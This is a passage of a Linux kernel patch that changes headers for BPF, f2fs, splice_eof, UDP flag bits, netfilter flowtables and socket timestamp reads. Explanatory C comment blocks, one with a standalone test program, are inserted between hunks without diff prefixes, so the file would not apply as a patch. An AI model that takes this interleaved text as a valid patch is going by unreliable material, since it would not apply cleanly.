++ */
++#define BPF_TRAMP_F_TAIL_CALL_CTX	BIT(7)
++
+ /* Each call __bpf_prog_enter + call bpf_func + call __bpf_prog_exit is ~50
+  * bytes on x86.
+  */
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 1a32baa78ce26..f080ccf27d256 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -429,6 +429,7 @@ struct bpf_insn_aux_data {
+ 	/* below fields are initialized once */
+ 	unsigned int orig_idx; /* original instruction index */
+ 	bool prune_point;
++	bool jmp_point;
+ };
+ 
+ #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index ee0d75d9a302d..1e0df607e40c4 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -40,9 +40,8 @@
+ 
+ #define F2FS_ENC_UTF8_12_1	1
+ 
+-#define F2FS_IO_SIZE(sbi)	(1 << F2FS_OPTION(sbi).write_io_size_bits) /* Blocks */
+-#define F2FS_IO_SIZE_KB(sbi)	(1 << (F2FS_OPTION(sbi).write_io_size_bits + 2)) /* KB */
+-#define F2FS_IO_SIZE_BYTES(sbi)	(1 << (F2FS_OPTION(sbi).write_io_size_bits + 12)) /* B */
++#define F2FS_IO_SIZE(sbi)	BIT(F2FS_OPTION(sbi).write_io_size_bits) /* Blocks */
++#define F2FS_IO_SIZE_KB(sbi)	BIT(F2FS_OPTION(sbi).write_io_size_bits + 2) /* KB */
+ #define F2FS_IO_SIZE_BITS(sbi)	(F2FS_OPTION(sbi).write_io_size_bits) /* power of 2 */
+ #define F2FS_IO_SIZE_MASK(sbi)	(F2FS_IO_SIZE(sbi) - 1)
+ #define F2FS_IO_ALIGNED(sbi)	(F2FS_IO_SIZE(sbi) > 1)
+@@ -340,7 +339,7 @@ enum {
+ 	OFFSET_BIT_SHIFT
+ };
+ 
+-#define OFFSET_BIT_MASK		(0x07)	/* (0x01 << OFFSET_BIT_SHIFT) - 1 */
++#define OFFSET_BIT_MASK		GENMASK(OFFSET_BIT_SHIFT - 1, 0)
+ 
+ struct node_footer {
+ 	__le32 nid;		/* node id */
+@@ -545,7 +544,7 @@ typedef __le32	f2fs_hash_t;
+ #define MAX_DIR_HASH_DEPTH	63
+ 
+ /* MAX buckets in one level of dir */
+-#define MAX_DIR_BUCKETS		(1 << ((MAX_DIR_HASH_DEPTH / 2) - 1))
++#define MAX_DIR_BUCKETS		BIT((MAX_DIR_HASH_DEPTH / 2) - 1)
+ 
+ /*
+  * space utilization of regular dentry and inline dentry (w/o extra reservation)
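/*
 * The conversions above are mechanical: BIT(n) is 1UL << n, and
 * GENMASK(h, l) builds a contiguous mask covering bits l..h inclusive, so
 * GENMASK(OFFSET_BIT_SHIFT - 1, 0) equals the old hand-written
 * (1 << OFFSET_BIT_SHIFT) - 1. A standalone check of the identities
 * (macro definitions simplified from the kernel's):
 */
#include <assert.h>

#define BIT(nr)		(1UL << (nr))
#define GENMASK(h, l) \
	(((~0UL) << (l)) & (~0UL >> (8 * sizeof(unsigned long) - 1 - (h))))

int main(void)
{
	assert(BIT(3) == 0x08);			/* F2FS_IO_SIZE-style usage */
	assert(GENMASK(2, 0) == 0x07);		/* old OFFSET_BIT_MASK value */
	return 0;
}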
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index b6af6abc7a77f..4a1911dcf834b 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2177,6 +2177,7 @@ struct file_operations {
+ 	int (*flock) (struct file *, int, struct file_lock *);
+ 	ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
+ 	ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
++	void (*splice_eof)(struct file *file);
+ 	int (*setlease)(struct file *, long, struct file_lock **, void **);
+ 	long (*fallocate)(struct file *file, int mode, loff_t offset,
+ 			  loff_t len);
+diff --git a/include/linux/group_cpus.h b/include/linux/group_cpus.h
+new file mode 100644
+index 0000000000000..e42807ec61f6e
+--- /dev/null
++++ b/include/linux/group_cpus.h
+@@ -0,0 +1,14 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/*
++ * Copyright (C) 2016 Thomas Gleixner.
++ * Copyright (C) 2016-2017 Christoph Hellwig.
++ */
++
++#ifndef __LINUX_GROUP_CPUS_H
++#define __LINUX_GROUP_CPUS_H
++#include <linux/kernel.h>
++#include <linux/cpu.h>
++
++struct cpumask *group_cpus_evenly(unsigned int numgrps);
++
++#endif
+diff --git a/include/linux/net.h b/include/linux/net.h
+index 18d942bbdf6e0..25baca60f6cba 100644
+--- a/include/linux/net.h
++++ b/include/linux/net.h
+@@ -209,6 +209,7 @@ struct proto_ops {
+ 				      int offset, size_t size, int flags);
+ 	ssize_t 	(*splice_read)(struct socket *sock,  loff_t *ppos,
+ 				       struct pipe_inode_info *pipe, size_t len, unsigned int flags);
++	void		(*splice_eof)(struct socket *sock);
+ 	int		(*set_peek_off)(struct sock *sk, int val);
+ 	int		(*peek_len)(struct socket *sock);
+ 
+diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
+index 03307b72de6c6..1be5a1fa6a3a8 100644
+--- a/include/linux/pagemap.h
++++ b/include/linux/pagemap.h
+@@ -199,6 +199,9 @@ enum mapping_flags {
+ 	/* writeback related tags are not used */
+ 	AS_NO_WRITEBACK_TAGS = 5,
+ 	AS_LARGE_FOLIO_SUPPORT = 6,
++	AS_RELEASE_ALWAYS,	/* Call ->release_folio(), even if no private data */
++	AS_STABLE_WRITES,	/* must wait for writeback before modifying
++				   folio contents */
+ };
+ 
+ /**
+@@ -269,6 +272,36 @@ static inline int mapping_use_writeback_tags(struct address_space *mapping)
+ 	return !test_bit(AS_NO_WRITEBACK_TAGS, &mapping->flags);
+ }
+ 
++static inline bool mapping_release_always(const struct address_space *mapping)
++{
++	return test_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline void mapping_set_release_always(struct address_space *mapping)
++{
++	set_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline void mapping_clear_release_always(struct address_space *mapping)
++{
++	clear_bit(AS_RELEASE_ALWAYS, &mapping->flags);
++}
++
++static inline bool mapping_stable_writes(const struct address_space *mapping)
++{
++	return test_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
++static inline void mapping_set_stable_writes(struct address_space *mapping)
++{
++	set_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
++static inline void mapping_clear_stable_writes(struct address_space *mapping)
++{
++	clear_bit(AS_STABLE_WRITES, &mapping->flags);
++}
++
+ static inline gfp_t mapping_gfp_mask(struct address_space * mapping)
+ {
+ 	return mapping->gfp_mask;
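/*
 * How the new accessors are meant to be used, sketched with a hypothetical
 * filesystem: a mapping whose private state is reachable only via
 * ->release_folio() opts in to AS_RELEASE_ALWAYS at setup time, and a
 * mapping whose pages must not change under writeback sets
 * AS_STABLE_WRITES. Both call sites below are illustrative only:
 */
static void example_fs_setup_mapping(struct address_space *mapping)
{
	mapping_set_release_always(mapping);	/* ->release_folio() even without private data */
	mapping_set_stable_writes(mapping);	/* writers must wait for writeback */
}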
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index c1637515a8a41..c953b8c0d2f43 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -106,6 +106,7 @@ struct sk_psock {
+ 	struct mutex			work_mutex;
+ 	struct sk_psock_work_state	work_state;
+ 	struct delayed_work		work;
++	struct sock			*sk_pair;
+ 	struct rcu_work			rwork;
+ };
+ 
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index 1db29aab8f9c3..b3c58042bd254 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -324,6 +324,7 @@ struct ucred {
+ 					  */
+ 
+ #define MSG_ZEROCOPY	0x4000000	/* Use user data in kernel path */
++#define MSG_SPLICE_PAGES 0x8000000	/* Splice the pages from the iterator in sendmsg() */
+ #define MSG_FASTOPEN	0x20000000	/* Send data in TCP SYN */
+ #define MSG_CMSG_CLOEXEC 0x40000000	/* Set close_on_exec for file
+ 					   descriptor received through
+@@ -334,6 +335,8 @@ struct ucred {
+ #define MSG_CMSG_COMPAT	0		/* We never have 32 bit fixups */
+ #endif
+ 
++/* Flags to be cleared on entry by sendmsg and sendmmsg syscalls */
++#define MSG_INTERNAL_SENDMSG_FLAGS (MSG_SPLICE_PAGES)
+ 
+ /* Setsockoptions(2) level. Thanks to BSD these must match IPPROTO_xxx */
+ #define SOL_IP		0
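/*
 * MSG_SPLICE_PAGES is kernel-internal: userspace must never be able to
 * smuggle it in through sendmsg()/sendmmsg(), so entry paths mask off
 * MSG_INTERNAL_SENDMSG_FLAGS before use (the io_uring hunks later in this
 * patch do exactly that). The sanitisation step, in isolation:
 */
static inline int sanitize_user_msg_flags(int user_flags)
{
	return user_flags & ~MSG_INTERNAL_SENDMSG_FLAGS;
}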
+diff --git a/include/linux/splice.h b/include/linux/splice.h
+index a55179fd60fc3..41a70687be853 100644
+--- a/include/linux/splice.h
++++ b/include/linux/splice.h
+@@ -38,6 +38,7 @@ struct splice_desc {
+ 		struct file *file;	/* file to read/write */
+ 		void *data;		/* cookie */
+ 	} u;
++	void (*splice_eof)(struct splice_desc *sd); /* Unexpected EOF handler */
+ 	loff_t pos;			/* file position */
+ 	loff_t *opos;			/* sendfile: output position */
+ 	size_t num_spliced;		/* number of bytes already spliced */
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index e96da4157d04d..efd9ab6df3797 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -30,25 +30,33 @@ static inline u32 udp_hashfn(const struct net *net, u32 num, u32 mask)
+ 	return (num + net_hash_mix(net)) & mask;
+ }
+ 
++enum {
++	UDP_FLAGS_CORK,		/* Cork is required */
++	UDP_FLAGS_NO_CHECK6_TX, /* Send zero UDP6 checksums on TX? */
++	UDP_FLAGS_NO_CHECK6_RX, /* Allow zero UDP6 checksums on RX? */
++	UDP_FLAGS_GRO_ENABLED,	/* Request GRO aggregation */
++	UDP_FLAGS_ACCEPT_FRAGLIST,
++	UDP_FLAGS_ACCEPT_L4,
++	UDP_FLAGS_ENCAP_ENABLED, /* This socket enabled encap */
++};
++
+ struct udp_sock {
+ 	/* inet_sock has to be the first member */
+ 	struct inet_sock inet;
+ #define udp_port_hash		inet.sk.__sk_common.skc_u16hashes[0]
+ #define udp_portaddr_hash	inet.sk.__sk_common.skc_u16hashes[1]
+ #define udp_portaddr_node	inet.sk.__sk_common.skc_portaddr_node
++
++	unsigned long	 udp_flags;
++
+ 	int		 pending;	/* Any pending frames ? */
+-	unsigned int	 corkflag;	/* Cork is required */
+ 	__u8		 encap_type;	/* Is this an Encapsulation socket? */
+-	unsigned char	 no_check6_tx:1,/* Send zero UDP6 checksums on TX? */
+-			 no_check6_rx:1,/* Allow zero UDP6 checksums on RX? */
+-			 encap_enabled:1, /* This socket enabled encap
+-					   * processing; UDP tunnels and
+-					   * different encapsulation layer set
+-					   * this
+-					   */
+-			 gro_enabled:1,	/* Request GRO aggregation */
+-			 accept_udp_l4:1,
+-			 accept_udp_fraglist:1;
++
++/* indicator bits used by pcflag: */
++#define UDPLITE_BIT      0x1  		/* set by udplite proto init function */
++#define UDPLITE_SEND_CC  0x2  		/* set via udplite setsockopt         */
++#define UDPLITE_RECV_CC  0x4		/* set via udplite setsockopt         */
++	__u8		 pcflag;        /* marks socket as UDP-Lite if > 0    */
+ 	/*
+ 	 * Following member retains the information to create a UDP header
+ 	 * when the socket is uncorked.
+@@ -60,12 +68,6 @@ struct udp_sock {
+ 	 */
+ 	__u16		 pcslen;
+ 	__u16		 pcrlen;
+-/* indicator bits used by pcflag: */
+-#define UDPLITE_BIT      0x1  		/* set by udplite proto init function */
+-#define UDPLITE_SEND_CC  0x2  		/* set via udplite setsockopt         */
+-#define UDPLITE_RECV_CC  0x4		/* set via udplite setsocktopt        */
+-	__u8		 pcflag;        /* marks socket as UDP-Lite if > 0    */
+-	__u8		 unused[3];
+ 	/*
+ 	 * For encapsulation sockets.
+ 	 */
+@@ -89,6 +91,17 @@ struct udp_sock {
+ 	int		forward_deficit;
+ };
+ 
++#define udp_test_bit(nr, sk)			\
++	test_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_set_bit(nr, sk)			\
++	set_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_test_and_set_bit(nr, sk)		\
++	test_and_set_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_clear_bit(nr, sk)			\
++	clear_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
++#define udp_assign_bit(nr, sk, val)		\
++	assign_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags, val)
++
+ #define UDP_MAX_SEGMENTS	(1 << 6UL)
+ 
+ static inline struct udp_sock *udp_sk(const struct sock *sk)
+@@ -98,22 +111,22 @@ static inline struct udp_sock *udp_sk(const struct sock *sk)
+ 
+ static inline void udp_set_no_check6_tx(struct sock *sk, bool val)
+ {
+-	udp_sk(sk)->no_check6_tx = val;
++	udp_assign_bit(NO_CHECK6_TX, sk, val);
+ }
+ 
+ static inline void udp_set_no_check6_rx(struct sock *sk, bool val)
+ {
+-	udp_sk(sk)->no_check6_rx = val;
++	udp_assign_bit(NO_CHECK6_RX, sk, val);
+ }
+ 
+-static inline bool udp_get_no_check6_tx(struct sock *sk)
++static inline bool udp_get_no_check6_tx(const struct sock *sk)
+ {
+-	return udp_sk(sk)->no_check6_tx;
++	return udp_test_bit(NO_CHECK6_TX, sk);
+ }
+ 
+-static inline bool udp_get_no_check6_rx(struct sock *sk)
++static inline bool udp_get_no_check6_rx(const struct sock *sk)
+ {
+-	return udp_sk(sk)->no_check6_rx;
++	return udp_test_bit(NO_CHECK6_RX, sk);
+ }
+ 
+ static inline void udp_cmsg_recv(struct msghdr *msg, struct sock *sk,
+@@ -132,10 +145,12 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 	if (!skb_is_gso(skb))
+ 		return false;
+ 
+-	if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4 && !udp_sk(sk)->accept_udp_l4)
++	if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4 &&
++	    !udp_test_bit(ACCEPT_L4, sk))
+ 		return true;
+ 
+-	if (skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST && !udp_sk(sk)->accept_udp_fraglist)
++	if (skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST &&
++	    !udp_test_bit(ACCEPT_FRAGLIST, sk))
+ 		return true;
+ 
+ 	return false;
+@@ -143,8 +158,8 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 
+ static inline void udp_allow_gso(struct sock *sk)
+ {
+-	udp_sk(sk)->accept_udp_l4 = 1;
+-	udp_sk(sk)->accept_udp_fraglist = 1;
++	udp_set_bit(ACCEPT_L4, sk);
++	udp_set_bit(ACCEPT_FRAGLIST, sk);
+ }
+ 
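/*
 * Why the bitfield-to-flag-word conversion above matters: adjacent C
 * bitfields share one memory word, so concurrent lockless updates can
 * clobber each other, while set_bit()/test_bit() on a dedicated unsigned
 * long are atomic. The wrappers only paste on the UDP_FLAGS_ prefix; the
 * two lines in this sketch are equivalent:
 */
static inline void example_enable_udp_gro(struct sock *sk)
{
	udp_set_bit(GRO_ENABLED, sk);
	/* == set_bit(UDP_FLAGS_GRO_ENABLED, &udp_sk(sk)->udp_flags); */
}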
+ #define udp_portaddr_for_each_entry(__sk, list) \
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 480fa579787e5..55ca217c626b7 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -77,6 +77,7 @@ static inline struct unix_sock *unix_sk(const struct sock *sk)
+ {
+ 	return (struct unix_sock *)sk;
+ }
++#define unix_peer(sk) (unix_sk(sk)->peer)
+ 
+ #define peer_wait peer_wq.wait
+ 
+diff --git a/include/net/inet_common.h b/include/net/inet_common.h
+index cec453c18f1d6..4673bbfd2811f 100644
+--- a/include/net/inet_common.h
++++ b/include/net/inet_common.h
+@@ -33,6 +33,7 @@ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 		bool kern);
+ int inet_send_prepare(struct sock *sk);
+ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size);
++void inet_splice_eof(struct socket *sock);
+ ssize_t inet_sendpage(struct socket *sock, struct page *page, int offset,
+ 		      size_t size, int flags);
+ int inet_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+diff --git a/include/net/ip.h b/include/net/ip.h
+index c286344628dba..c83c09c65623f 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -95,7 +95,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ 	ipcm_init(ipcm);
+ 
+ 	ipcm->sockc.mark = READ_ONCE(inet->sk.sk_mark);
+-	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
++	ipcm->sockc.tsflags = READ_ONCE(inet->sk.sk_tsflags);
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
+ 	ipcm->protocol = inet->inet_num;
+diff --git a/include/net/netfilter/nf_conntrack_act_ct.h b/include/net/netfilter/nf_conntrack_act_ct.h
+index 078d3c52c03f9..e5f2f0b73a9a0 100644
+--- a/include/net/netfilter/nf_conntrack_act_ct.h
++++ b/include/net/netfilter/nf_conntrack_act_ct.h
+@@ -20,7 +20,22 @@ static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_find(const struct nf
+ #endif
+ }
+ 
+-static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct nf_conn *ct)
++static inline void nf_conn_act_ct_ext_fill(struct sk_buff *skb, struct nf_conn *ct,
++					   enum ip_conntrack_info ctinfo)
++{
++#if IS_ENABLED(CONFIG_NET_ACT_CT)
++	struct nf_conn_act_ct_ext *act_ct_ext;
++
++	act_ct_ext = nf_conn_act_ct_ext_find(ct);
++	if (dev_net(skb->dev) == &init_net && act_ct_ext)
++		act_ct_ext->ifindex[CTINFO2DIR(ctinfo)] = skb->dev->ifindex;
++#endif
++}
++
++static inline struct
++nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct sk_buff *skb,
++					   struct nf_conn *ct,
++					   enum ip_conntrack_info ctinfo)
+ {
+ #if IS_ENABLED(CONFIG_NET_ACT_CT)
+ 	struct nf_conn_act_ct_ext *act_ct = nf_ct_ext_find(ct, NF_CT_EXT_ACT_CT);
+@@ -29,22 +44,11 @@ static inline struct nf_conn_act_ct_ext *nf_conn_act_ct_ext_add(struct nf_conn *
+ 		return act_ct;
+ 
+ 	act_ct = nf_ct_ext_add(ct, NF_CT_EXT_ACT_CT, GFP_ATOMIC);
++	nf_conn_act_ct_ext_fill(skb, ct, ctinfo);
+ 	return act_ct;
+ #else
+ 	return NULL;
+ #endif
+ }
+ 
+-static inline void nf_conn_act_ct_ext_fill(struct sk_buff *skb, struct nf_conn *ct,
+-					   enum ip_conntrack_info ctinfo)
+-{
+-#if IS_ENABLED(CONFIG_NET_ACT_CT)
+-	struct nf_conn_act_ct_ext *act_ct_ext;
+-
+-	act_ct_ext = nf_conn_act_ct_ext_find(ct);
+-	if (dev_net(skb->dev) == &init_net && act_ct_ext)
+-		act_ct_ext->ifindex[CTINFO2DIR(ctinfo)] = skb->dev->ifindex;
+-#endif
+-}
+-
+ #endif /* _NF_CONNTRACK_ACT_CT_H */
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index cd982f4a0f50c..dde4dd9c4012c 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -53,14 +53,17 @@ struct nf_flowtable_type {
+ 	struct list_head		list;
+ 	int				family;
+ 	int				(*init)(struct nf_flowtable *ft);
++	bool				(*gc)(const struct flow_offload *flow);
+ 	int				(*setup)(struct nf_flowtable *ft,
+ 						 struct net_device *dev,
+ 						 enum flow_block_command cmd);
+ 	int				(*action)(struct net *net,
+-						  const struct flow_offload *flow,
++						  struct flow_offload *flow,
+ 						  enum flow_offload_tuple_dir dir,
+ 						  struct nf_flow_rule *flow_rule);
+ 	void				(*free)(struct nf_flowtable *ft);
++	void				(*get)(struct nf_flowtable *ft);
++	void				(*put)(struct nf_flowtable *ft);
+ 	nf_hookfn			*hook;
+ 	struct module			*owner;
+ };
+@@ -164,6 +167,8 @@ enum nf_flow_flags {
+ 	NF_FLOW_HW_DYING,
+ 	NF_FLOW_HW_DEAD,
+ 	NF_FLOW_HW_PENDING,
++	NF_FLOW_HW_BIDIRECTIONAL,
++	NF_FLOW_HW_ESTABLISHED,
+ };
+ 
+ enum flow_offload_type {
+@@ -237,6 +242,11 @@ nf_flow_table_offload_add_cb(struct nf_flowtable *flow_table,
+ 	}
+ 
+ 	list_add_tail(&block_cb->list, &block->cb_list);
++	up_write(&flow_table->flow_block_lock);
++
++	if (flow_table->type->get)
++		flow_table->type->get(flow_table);
++	return 0;
+ 
+ unlock:
+ 	up_write(&flow_table->flow_block_lock);
+@@ -259,6 +269,9 @@ nf_flow_table_offload_del_cb(struct nf_flowtable *flow_table,
+ 		WARN_ON(true);
+ 	}
+ 	up_write(&flow_table->flow_block_lock);
++
++	if (flow_table->type->put)
++		flow_table->type->put(flow_table);
+ }
+ 
+ int flow_offload_route_init(struct flow_offload *flow,
+@@ -266,7 +279,7 @@ int flow_offload_route_init(struct flow_offload *flow,
+ 
+ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow);
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+-			  struct flow_offload *flow);
++			  struct flow_offload *flow, bool force);
+ 
+ struct flow_offload_tuple_rhash *flow_offload_lookup(struct nf_flowtable *flow_table,
+ 						     struct flow_offload_tuple *tuple);
+@@ -312,10 +325,10 @@ void nf_flow_table_offload_flush_cleanup(struct nf_flowtable *flowtable);
+ int nf_flow_table_offload_setup(struct nf_flowtable *flowtable,
+ 				struct net_device *dev,
+ 				enum flow_block_command cmd);
+-int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv4(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule);
+-int nf_flow_rule_route_ipv6(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule);
+ 
+diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h
+index c4a6147b0ef8c..5225d2bd1a6e9 100644
+--- a/include/net/netfilter/nf_tables_ipv4.h
++++ b/include/net/netfilter/nf_tables_ipv4.h
+@@ -29,8 +29,8 @@ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ 	if (iph->ihl < 5 || iph->version != 4)
+ 		return -1;
+ 
+-	len = ntohs(iph->tot_len);
+-	thoff = iph->ihl * 4;
++	len = iph_totlen(pkt->skb, iph);
++	thoff = skb_network_offset(pkt->skb) + (iph->ihl * 4);
+ 	if (pkt->skb->len < len)
+ 		return -1;
+ 	else if (len < thoff)
+@@ -62,7 +62,7 @@ static inline int nft_set_pktinfo_ipv4_ingress(struct nft_pktinfo *pkt)
+ 	if (iph->ihl < 5 || iph->version != 4)
+ 		goto inhdr_error;
+ 
+-	len = ntohs(iph->tot_len);
++	len = iph_totlen(pkt->skb, iph);
+ 	thoff = iph->ihl * 4;
+ 	if (pkt->skb->len < len) {
+ 		__IP_INC_STATS(nft_net(pkt), IPSTATS_MIB_INTRUNCATEDPKTS);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index b6027b01c2455..6b51e85ae69e3 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1279,6 +1279,7 @@ struct proto {
+ 					   size_t len, int flags, int *addr_len);
+ 	int			(*sendpage)(struct sock *sk, struct page *page,
+ 					int offset, size_t size, int flags);
++	void			(*splice_eof)(struct socket *sock);
+ 	int			(*bind)(struct sock *sk,
+ 					struct sockaddr *addr, int addr_len);
+ 	int			(*bind_add)(struct sock *sk,
+@@ -1928,7 +1929,9 @@ struct sockcm_cookie {
+ static inline void sockcm_init(struct sockcm_cookie *sockc,
+ 			       const struct sock *sk)
+ {
+-	*sockc = (struct sockcm_cookie) { .tsflags = sk->sk_tsflags };
++	*sockc = (struct sockcm_cookie) {
++		.tsflags = READ_ONCE(sk->sk_tsflags)
++	};
+ }
+ 
+ int __sock_cmsg_send(struct sock *sk, struct msghdr *msg, struct cmsghdr *cmsg,
+@@ -2741,9 +2744,9 @@ void __sock_recv_wifi_status(struct msghdr *msg, struct sock *sk,
+ static inline void
+ sock_recv_timestamp(struct msghdr *msg, struct sock *sk, struct sk_buff *skb)
+ {
+-	ktime_t kt = skb->tstamp;
+ 	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
+-
++	u32 tsflags = READ_ONCE(sk->sk_tsflags);
++	ktime_t kt = skb->tstamp;
+ 	/*
+ 	 * generate control messages if
+ 	 * - receive time stamping in software requested
+@@ -2751,10 +2754,10 @@ sock_recv_timestamp(struct msghdr *msg, struct sock *sk, struct sk_buff *skb)
+ 	 * - hardware time stamps available and wanted
+ 	 */
+ 	if (sock_flag(sk, SOCK_RCVTSTAMP) ||
+-	    (sk->sk_tsflags & SOF_TIMESTAMPING_RX_SOFTWARE) ||
+-	    (kt && sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE) ||
++	    (tsflags & SOF_TIMESTAMPING_RX_SOFTWARE) ||
++	    (kt && tsflags & SOF_TIMESTAMPING_SOFTWARE) ||
+ 	    (hwtstamps->hwtstamp &&
+-	     (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)))
++	     (tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)))
+ 		__sock_recv_timestamp(msg, sk, skb);
+ 	else
+ 		sock_write_timestamp(sk, kt);
+@@ -2776,7 +2779,8 @@ static inline void sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+ #define TSFLAGS_ANY	  (SOF_TIMESTAMPING_SOFTWARE			| \
+ 			   SOF_TIMESTAMPING_RAW_HARDWARE)
+ 
+-	if (sk->sk_flags & FLAGS_RECV_CMSGS || sk->sk_tsflags & TSFLAGS_ANY)
++	if (sk->sk_flags & FLAGS_RECV_CMSGS ||
++	    READ_ONCE(sk->sk_tsflags) & TSFLAGS_ANY)
+ 		__sock_recv_cmsgs(msg, sk, skb);
+ 	else if (unlikely(sock_flag(sk, SOCK_TIMESTAMP)))
+ 		sock_write_timestamp(sk, skb->tstamp);
+@@ -2825,6 +2829,11 @@ static inline bool sk_is_tcp(const struct sock *sk)
+ 	return sk->sk_type == SOCK_STREAM && sk->sk_protocol == IPPROTO_TCP;
+ }
+ 
++static inline bool sk_is_stream_unix(const struct sock *sk)
++{
++	return sk->sk_family == AF_UNIX && sk->sk_type == SOCK_STREAM;
++}
++
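/*
 * sk->sk_tsflags may now be rewritten while lockless readers run, so every
 * read above goes through READ_ONCE() to take one coherent snapshot and to
 * keep the compiler from re-loading the field between checks. The pattern,
 * in isolation (the example_ helper is illustrative):
 */
static inline bool example_wants_rx_sw_tstamp(const struct sock *sk)
{
	u32 tsflags = READ_ONCE(sk->sk_tsflags);	/* single snapshot */

	return tsflags & SOF_TIMESTAMPING_RX_SOFTWARE;
}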
+ /**
+  * sk_eat_skb - Release a skb if it is no longer needed
+  * @sk: socket to eat this skb from
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index c3d56b337f358..4c838f7290dd9 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -332,6 +332,7 @@ int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);
+ int tcp_sendmsg_locked(struct sock *sk, struct msghdr *msg, size_t size);
+ int tcp_sendmsg_fastopen(struct sock *sk, struct msghdr *msg, int *copied,
+ 			 size_t size, struct ubuf_info *uarg);
++void tcp_splice_eof(struct socket *sock);
+ int tcp_sendpage(struct sock *sk, struct page *page, int offset, size_t size,
+ 		 int flags);
+ int tcp_sendpage_locked(struct sock *sk, struct page *page, int offset,
+diff --git a/include/net/udp.h b/include/net/udp.h
+index fee053bcd17c6..fa4cdbe55552c 100644
+--- a/include/net/udp.h
++++ b/include/net/udp.h
+@@ -269,6 +269,7 @@ int udp_get_port(struct sock *sk, unsigned short snum,
+ int udp_err(struct sk_buff *, u32);
+ int udp_abort(struct sock *sk, int err);
+ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len);
++void udp_splice_eof(struct socket *sock);
+ int udp_push_pending_frames(struct sock *sk);
+ void udp_flush_pending_frames(struct sock *sk);
+ int udp_cmsg_send(struct sock *sk, struct msghdr *msg, u16 *gso_size);
+diff --git a/include/net/udp_tunnel.h b/include/net/udp_tunnel.h
+index 72394f441dad8..e5f81710b18f4 100644
+--- a/include/net/udp_tunnel.h
++++ b/include/net/udp_tunnel.h
+@@ -174,16 +174,13 @@ static inline int udp_tunnel_handle_offloads(struct sk_buff *skb, bool udp_csum)
+ }
+ #endif
+ 
+-static inline void udp_tunnel_encap_enable(struct socket *sock)
++static inline void udp_tunnel_encap_enable(struct sock *sk)
+ {
+-	struct udp_sock *up = udp_sk(sock->sk);
+-
+-	if (up->encap_enabled)
